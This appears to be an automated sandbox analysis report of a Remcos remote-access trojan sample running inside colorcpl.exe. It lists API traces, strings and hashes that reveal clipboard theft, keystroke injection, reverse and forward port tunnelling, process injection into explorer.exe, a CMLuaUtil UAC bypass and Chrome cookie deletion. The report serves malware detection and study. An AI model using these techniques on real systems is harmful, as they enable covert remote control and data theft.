                                                          Function 02FAAB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,02FAA517,00000000), ref: 02FAABAD
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,02FAA517,00000000), ref: 02FAABC4
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02FAA517,00000000), ref: 02FAABD1
                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,02FAA517,00000000), ref: 02FAABE0
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02FAA517,00000000), ref: 02FAABF1
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02FAA517,00000000), ref: 02FAABF4
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: 58a1b30afe7fb167efec1c944a00d0c274c484b347ef3a9b6d43fea5f736acf0
                                                          • Instruction ID: f5300faeea46d55bb97e7cf6bb35040ab6be4caeb8ad3d48d710fe64c3403e90
                                                          • Opcode Fuzzy Hash: 58a1b30afe7fb167efec1c944a00d0c274c484b347ef3a9b6d43fea5f736acf0
                                                          • Instruction Fuzzy Hash: DF11E572D8111CBFDB12AB759C88DFF7B7CDB42AE1B400416FB0696140EBA48D49DAB1
                                                          Function 02FD81A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 02FD81B5
                                                            • Part of subcall function 02FD6802: RtlFreeHeap.NTDLL(00000000,00000000,?,02FE0CEF,?,00000000,?,00000000,?,02FE0F93,?,00000007,?,?,02FE14DE,?), ref: 02FD6818
                                                            • Part of subcall function 02FD6802: GetLastError.KERNEL32(?,?,02FE0CEF,?,00000000,?,00000000,?,02FE0F93,?,00000007,?,?,02FE14DE,?,?), ref: 02FD682A
                                                          • _free.LIBCMT ref: 02FD81C1
                                                          • _free.LIBCMT ref: 02FD81CC
                                                          • _free.LIBCMT ref: 02FD81D7
                                                          • _free.LIBCMT ref: 02FD81E2
                                                          • _free.LIBCMT ref: 02FD81ED
                                                          • _free.LIBCMT ref: 02FD81F8
                                                          • _free.LIBCMT ref: 02FD8203
                                                          • _free.LIBCMT ref: 02FD820E
                                                          • _free.LIBCMT ref: 02FD821C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: a6e25838a7112d05adab680db68a709fd41a760b8b65c12ea30f51b2c2870b29
                                                          • Instruction ID: cd16758def8ccac3c73e465262bc288fb53ec4262522b70d035dbc8a977d63e2
                                                          • Opcode Fuzzy Hash: a6e25838a7112d05adab680db68a709fd41a760b8b65c12ea30f51b2c2870b29
                                                          • Instruction Fuzzy Hash: FE11B6B6940108BFCB01EF54DC52CD97BABFF04391B4945A5FA488F261DB71EA50AF80
                                                          Function 02FA1530 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Eventinet_ntoa
                                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$X=t
                                                          • API String ID: 3578746661-247780323
                                                          • Opcode ID: 2a9d86930cb3d0147ce9730805902b4c153491b83de5dfc74a8e39c8cebebca0
                                                          • Instruction ID: 5c63fcf7b9ea540177d5558e32e114ba970325da9d6c823239786b5275fb1c49
                                                          • Opcode Fuzzy Hash: 2a9d86930cb3d0147ce9730805902b4c153491b83de5dfc74a8e39c8cebebca0
                                                          • Instruction Fuzzy Hash: 9051C571B042455BDB14FB34CC68A6F77AAAB403C4F40092AE719876A4DF789D09CF92
                                                          Function 02FAA045 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02FAA04A
                                                          • GdiplusStartup.GDIPLUS(03004ACC,?,00000000), ref: 02FAA07C
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 02FAA108
                                                          • Sleep.KERNEL32(000003E8), ref: 02FAA18E
                                                          • GetLocalTime.KERNEL32(?), ref: 02FAA196
                                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 02FAA285
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                          • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                          • API String ID: 489098229-3790400642
                                                          • Opcode ID: 3b8cb5600b0408c36e5d5fcb5005a71d9977a98921b5258ebb26488517725b4e
                                                          • Instruction ID: a10f5b6a4d9547c3eb372e7a251d00b58de6c31b2df6dcf10ec80c998d59c1dd
                                                          • Opcode Fuzzy Hash: 3b8cb5600b0408c36e5d5fcb5005a71d9977a98921b5258ebb26488517725b4e
                                                          • Instruction Fuzzy Hash: 6D517F71E002199AEF15FBB4CC64AFEB7BAAF55384F400069E709AB190EF645D49CF60
                                                          Function 02FA74D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 02FA7530
                                                            • Part of subcall function 02FAC516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02F9A87E), ref: 02FAC52F
                                                          • Sleep.KERNEL32(00000064), ref: 02FA755C
                                                          • DeleteFileW.KERNEL32(00000000), ref: 02FA7590
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CreateDeleteExecuteShellSleep
                                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                          • API String ID: 1462127192-2001430897
                                                          • Opcode ID: 6a382eb56d45bd294352081d51f82600e6694c2d77c3a68e10bf5d08c4673ad7
                                                          • Instruction ID: 2c1e63187144e10d48dce5134854e2f8017353e7e57462f2baeca7d722aa1584
                                                          • Opcode Fuzzy Hash: 6a382eb56d45bd294352081d51f82600e6694c2d77c3a68e10bf5d08c4673ad7
                                                          • Instruction Fuzzy Hash: E631647194011D9AFF14FBA0DC91EFEB73AAF107C4F000569E70A67190EF605A8ACE94
                                                          Function 02F973E7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(03002B14,00000000,030052D8,00003000,00000004,00000000,00000001), ref: 02F97418
                                                          • GetCurrentProcess.KERNEL32(03002B14,00000000,00008000,?,00000000,00000001,00000000,02F97691,C:\Windows\SysWOW64\colorcpl.exe), ref: 02F974D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CurrentProcess
                                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                          • API String ID: 2050909247-4242073005
                                                          • Opcode ID: 427be8bef0051e4ae030a7a0c0e6a0d35710067e54248d1245e3140cc335642c
                                                          • Instruction ID: b137db1351caed095322bd2236250957744ba2ec104bd6f1502122bcb02ad2c8
                                                          • Opcode Fuzzy Hash: 427be8bef0051e4ae030a7a0c0e6a0d35710067e54248d1245e3140cc335642c
                                                          • Instruction Fuzzy Hash: F531CEB2662300AFFB50FF68DC89F1AB7ADAB05799F100819F711E6654DB78D8008F61
                                                          Function 02FAD4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02FAD507
                                                            • Part of subcall function 02FAD5A0: RegisterClassExA.USER32(00000030), ref: 02FAD5EC
                                                            • Part of subcall function 02FAD5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 02FAD607
                                                            • Part of subcall function 02FAD5A0: GetLastError.KERNEL32 ref: 02FAD611
                                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 02FAD53E
                                                          • lstrcpynA.KERNEL32(03004B60,Remcos,00000080), ref: 02FAD558
                                                          • Shell_NotifyIconA.SHELL32(00000000,03004B48), ref: 02FAD56E
                                                          • TranslateMessage.USER32(?), ref: 02FAD57A
                                                          • DispatchMessageA.USER32(?), ref: 02FAD584
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02FAD591
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                          • String ID: Remcos
                                                          • API String ID: 1970332568-165870891
                                                          • Opcode ID: 922c47510b9b2e584b69c44f248a733fd0c41f4c1b211e30eaaaa08505a2b7fb
                                                          • Instruction ID: b27435003332332d50b03225da0260a9725e65f35ecfb23d6cbcf3ca103492c5
                                                          • Opcode Fuzzy Hash: 922c47510b9b2e584b69c44f248a733fd0c41f4c1b211e30eaaaa08505a2b7fb
                                                          • Instruction Fuzzy Hash: FF010CB1941248EFEB10EBA6E84CF9ABBBCAB85748F004419F61197185D7B850558F64
                                                          Function 02FD51FA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02FD8295: GetLastError.KERNEL32(00000020,?,02FCA875,?,?,?,02FCF9F8,?,?,00000020,00000000,?,?,?,02FBDD92,0000003B), ref: 02FD8299
                                                            • Part of subcall function 02FD8295: _free.LIBCMT ref: 02FD82CC
                                                            • Part of subcall function 02FD8295: SetLastError.KERNEL32(00000000,02FCF9F8,?,?,00000020,00000000,?,?,?,02FBDD92,0000003B,?,00000041,00000000,00000000), ref: 02FD830D
                                                            • Part of subcall function 02FD8295: _abort.LIBCMT ref: 02FD8313
                                                          • _memcmp.LIBVCRUNTIME ref: 02FD54A4
                                                          • _free.LIBCMT ref: 02FD5515
                                                          • _free.LIBCMT ref: 02FD552E
                                                          • _free.LIBCMT ref: 02FD5560
                                                          • _free.LIBCMT ref: 02FD5569
                                                          • _free.LIBCMT ref: 02FD5575
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                          • String ID: C
                                                          • API String ID: 1679612858-1037565863
                                                          • Opcode ID: f63d67da839974f6464f21b321d4400677d4e43379f9778dcf9142f135658384
                                                          • Instruction ID: 271432653af2b06e92d6ad3cf615227df3e89019efcbd7a576f56526cd4c312a
                                                          • Opcode Fuzzy Hash: f63d67da839974f6464f21b321d4400677d4e43379f9778dcf9142f135658384
                                                          • Instruction Fuzzy Hash: CAB16B75E012199FDB24DF18C884BADB7B6FF08345F9445AADA0AA7350E771AE90CF40
                                                          Function 02FA4945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tcp$udp
                                                          • API String ID: 0-3725065008
                                                          • Opcode ID: eb5556802adc7ccd6a1185782b3a19f38eb94240a2cac5942d9b802d60cdedf8
                                                          • Instruction ID: 0e9a37ee758075729768e1b3b0884b2e9717d46ca819e0877ff834c3113deda4
                                                          • Opcode Fuzzy Hash: eb5556802adc7ccd6a1185782b3a19f38eb94240a2cac5942d9b802d60cdedf8
                                                          • Instruction Fuzzy Hash: 49717FB9A093068FDB24CE54C46572AB7E5FF887C8F14482EFA8687260D7F4C944DB52
                                                          Function 02F9799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,03004EE0,02FF5FB4,?,00000000,02F98037,00000000), ref: 02F97A00
                                                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,02F98037,00000000,?,?,0000000A,00000000), ref: 02F97A48
                                                            • Part of subcall function 02F94AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02F94B36
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,02F98037,00000000,?,?,0000000A,00000000), ref: 02F97A88
                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 02F97AA5
                                                          • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 02F97AD0
                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 02F97AE0
                                                            • Part of subcall function 02F94B96: WaitForSingleObject.KERNEL32(?,000000FF,?,03004EF8,02F94C49,00000000,?,?,?,03004EF8,?), ref: 02F94BA5
                                                            • Part of subcall function 02F94B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02F9548B), ref: 02F94BC3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                          • String ID: .part
                                                          • API String ID: 1303771098-3499674018
                                                          • Opcode ID: f17e3cf3119c1af140c3676c61aaed52adca5990fa3a1eef05e99185fe9c9656
                                                          • Instruction ID: d0504df40c9c49967dfc2c9733b179a443aaf6c9a1d2380ec1cec98895315edd
                                                          • Opcode Fuzzy Hash: f17e3cf3119c1af140c3676c61aaed52adca5990fa3a1eef05e99185fe9c9656
                                                          • Instruction Fuzzy Hash: 4F31A071548349AFEB14EB60DC449ABF3ADFF94395F00492DF68692150EB709E08CFA2
                                                          Function 02FA99DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendInput.USER32 ref: 02FA9A25
                                                          • SendInput.USER32(00000001,?,0000001C,00000000), ref: 02FA9A4D
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 02FA9A74
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 02FA9A92
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 02FA9AB2
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 02FA9AD7
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 02FA9AF9
                                                          • SendInput.USER32(00000001,00000000,0000001C), ref: 02FA9B1C
                                                            • Part of subcall function 02FA99CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 02FA99D4
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InputSend$Virtual
                                                          • String ID:
                                                          • API String ID: 1167301434-0
                                                          • Opcode ID: fca5fb6f645d95b16f9118492f2e8e276f034bf71b8b650e714e00a52ed8a47d
                                                          • Instruction ID: 2f3964b1019d216b77004e7c36fa36c7281d339b1627b57b705470c4ad1ce707
                                                          • Opcode Fuzzy Hash: fca5fb6f645d95b16f9118492f2e8e276f034bf71b8b650e714e00a52ed8a47d
                                                          • Instruction Fuzzy Hash: 96319F61248349A9E221DFA5DC50B9FFBECAFC9B84F04081FB68497190DAE0894C8767
                                                          Function 02FA697B Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenClipboard.USER32 ref: 02FA697C
                                                          • EmptyClipboard.USER32 ref: 02FA698A
                                                          • CloseClipboard.USER32 ref: 02FA6990
                                                          • OpenClipboard.USER32 ref: 02FA6997
                                                          • GetClipboardData.USER32(0000000D), ref: 02FA69A7
                                                          • GlobalLock.KERNEL32(00000000), ref: 02FA69B0
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 02FA69B9
                                                          • CloseClipboard.USER32 ref: 02FA69BF
                                                            • Part of subcall function 02F94AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02F94B36
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                          • String ID:
                                                          • API String ID: 2172192267-0
                                                          • Opcode ID: e85d7a0d7872fc19a526c3ce81347619a8159a70fe8113ce85822c16a662fe82
                                                          • Instruction ID: 475d61848598f5a5d484f56df8ed15162f2321af30af798c841e61326887d0dd
                                                          • Opcode Fuzzy Hash: e85d7a0d7872fc19a526c3ce81347619a8159a70fe8113ce85822c16a662fe82
                                                          • Instruction Fuzzy Hash: C0015E71A44208DFDB15BB70DC58AAEB7AAAF907C1F40086DE606861C0DFB58815CA61
                                                          Function 02FE0AA5 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: dbc35d27752e36bfd7472e9f2f8e0768f432deac141ef2e3ff62114524d14f82
                                                          • Instruction ID: c760b0a42baf61c2400b1da0122bb627ac3cd806657c4cc912f8f964b7dc7df8
                                                          • Opcode Fuzzy Hash: dbc35d27752e36bfd7472e9f2f8e0768f432deac141ef2e3ff62114524d14f82
                                                          • Instruction Fuzzy Hash: 0761AF76D00205AFDF21DF68CC41B9ABBFAEF05790F14416AEA45FB281EBB09941DB50
                                                          Function 02FDB43C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,02FDBBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 02FDB47E
                                                          • __fassign.LIBCMT ref: 02FDB4F9
                                                          • __fassign.LIBCMT ref: 02FDB514
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 02FDB53A
                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,02FDBBB1,00000000,?,?,?,?,?,?,?,?,?,02FDBBB1,?), ref: 02FDB559
                                                          • WriteFile.KERNEL32(?,?,00000001,02FDBBB1,00000000,?,?,?,?,?,?,?,?,?,02FDBBB1,?), ref: 02FDB592
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                          • String ID:
                                                          • API String ID: 1324828854-0
                                                          • Opcode ID: 3d38e0534c2c93b1171e783f9d1ca7b163c50f772bfd496311931d5cb2de32b2
                                                          • Instruction ID: f4b935e4b0bdddadec7ee94924e24c1a5c5e73ca9094b5706341cae92874468e
                                                          • Opcode Fuzzy Hash: 3d38e0534c2c93b1171e783f9d1ca7b163c50f772bfd496311931d5cb2de32b2
                                                          • Instruction Fuzzy Hash: 3751C3B1E002099FCB10CFA8D884BEEBBB9EF08344F19455AEA51E7281DB709951CB60
                                                          Function 02FE6BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 029f9595e4b64a457aa3dc48954505ac5b9784b39db3608599f6a28904b20552
                                                          • Instruction ID: ae9b1383103627e1a4fd87567627be76e79ca7559eb2b3a9c4baa0eb9d0404cd
                                                          • Opcode Fuzzy Hash: 029f9595e4b64a457aa3dc48954505ac5b9784b39db3608599f6a28904b20552
                                                          • Instruction Fuzzy Hash: 5D11B7B2905219BFDF226FBA9C04A5B7A6EEF857E1B144619BA16C7250DE308801CB70
                                                          Function 02FCA3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,02FCA3D1,02FC933E), ref: 02FCA3E8
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02FCA3F6
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02FCA40F
                                                          • SetLastError.KERNEL32(00000000,?,02FCA3D1,02FC933E), ref: 02FCA461
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: d44d161f1afb542dc88f51ca0baf7df6d355b85dedd6b168571dab8bac552c33
                                                          • Instruction ID: 19d3f1a73c839d93f65c9ced0a8aadb5ea3ee1503e0ca8b66c249cc2641ea8b3
                                                          • Opcode Fuzzy Hash: d44d161f1afb542dc88f51ca0baf7df6d355b85dedd6b168571dab8bac552c33
                                                          • Instruction Fuzzy Hash: CB014C77B0931B5EDB153BB9BF88A6B364ADB013F9730423DFB14440E5EFA158009540
                                                          Function 02F975EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\SysWOW64\colorcpl.exe), ref: 02F9760B
                                                            • Part of subcall function 02F97538: _wcslen.LIBCMT ref: 02F9755C
                                                            • Part of subcall function 02F97538: CoGetObject.OLE32(?,00000024,02FF6528,00000000), ref: 02F975BD
                                                          • CoUninitialize.OLE32 ref: 02F97664
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeObjectUninitialize_wcslen
                                                          • String ID: C:\Windows\SysWOW64\colorcpl.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                          • API String ID: 3851391207-3410284080
                                                          • Opcode ID: 49329e9a6ea76b0e21a5267b3fe2cd03f59e64151bc6b0d0b83bf8fc5236313a
                                                          • Instruction ID: 5dd6ba3e3281162fb3a9a40ce419b5fe526a9cc2c0bdd13236726dd58f11d4fe
                                                          • Opcode Fuzzy Hash: 49329e9a6ea76b0e21a5267b3fe2cd03f59e64151bc6b0d0b83bf8fc5236313a
                                                          • Instruction Fuzzy Hash: 370196B27213146BFB247A54DD4AF6BB74DDF41AA5F11011EF7018A240EB91EC018EB1
                                                          Function 02F9BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 02F9BB18
                                                          • GetLastError.KERNEL32 ref: 02F9BB22
                                                          Strings
                                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 02F9BAE3
                                                          • UserProfile, xrefs: 02F9BAE8
                                                          • [Chrome Cookies found, cleared!], xrefs: 02F9BB48
                                                          • [Chrome Cookies not found], xrefs: 02F9BB3C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
